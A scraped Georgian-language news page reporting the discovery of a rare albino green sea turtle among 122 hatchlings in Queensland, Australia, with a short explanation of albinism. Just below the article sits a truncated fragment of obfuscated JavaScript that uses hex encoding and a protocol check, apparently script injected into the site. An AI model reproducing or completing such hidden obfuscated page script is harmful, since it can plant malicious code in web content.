ავსტრალიაში ალბინოსი კუ აღმოაჩინეს (+ვიდეო)
ავსტრალიაში ალბინოსი კუ აღმოაჩინეს (+ვიდეო)
ავსტრალიაში, კვინსლენდის შტატის ჩრდილო-აღმოსავლეთ სანაპიროზე სანაპიროების მოვლის საზოგადოების მოხალისეებმა ძალიან იშვიათი თეთრი კუ აღმოაჩინეს. ალბინოსი 122 პატარა მწვანე კუს შორის იპოვეს.

გარემოს დაცვის დეპარტამენტის წარმომადგენლის, ექიმ კოლ ლიმპუსის ცნობით, მწვანე კუებს შორის ალბინოსის დაბადება ძალიან იშვიათი შემთხვევაა. მსგავსი შეფერილობის კუ შეიძლება ასიათას კუში ერთი აღმოჩნდეს.

ალბინოსისთვის დამახასიათებელია კანის, თმისა და თვალის ინტენსიური შეფერილობის შესუსტება. ეს მელანინის ფერმენტის გამომუშავების პრობლემასთანაა დაკავშირებული.
ასეთ თავისებურებას ორგანიზმი იძენს რეცესიული ტიპის მიხედვით - შვილი ალბინოსის დაბადებისთვის საჭიროა მისი ორივე მშობელი ატარებდეს დეფექტურ გენს.

იხილეთ ვიდეო
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
კომენტარი ჯერ არ გაკეთებულა
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?